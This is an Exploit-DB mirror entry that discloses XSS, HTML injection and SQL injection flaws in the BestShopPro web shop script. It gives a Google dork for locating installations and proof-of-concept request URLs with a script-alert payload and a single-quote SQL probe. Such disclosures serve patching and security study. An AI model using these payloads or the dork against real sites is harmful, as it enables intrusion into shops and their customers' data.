exploit-db-mirror/exploits/php/webapps/18063.txt
Offensive Security d63de06c7a DB: 2022-11-10
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

25 lines
No EOL
766 B
Text

################################################################################################
# Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
#
# Author : CoBRa_21
#
# E-Mail : uyku_cu [at] windowslive.com
#
# Google Dork : "Powered By BST"
#
# Script Page : http://www.bst.pl
################################################################################################
#
# XSS:
#
# http://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>
#
# HTML:
#
# http://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>
#
# SQL :
#
# http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
#
################################################################################################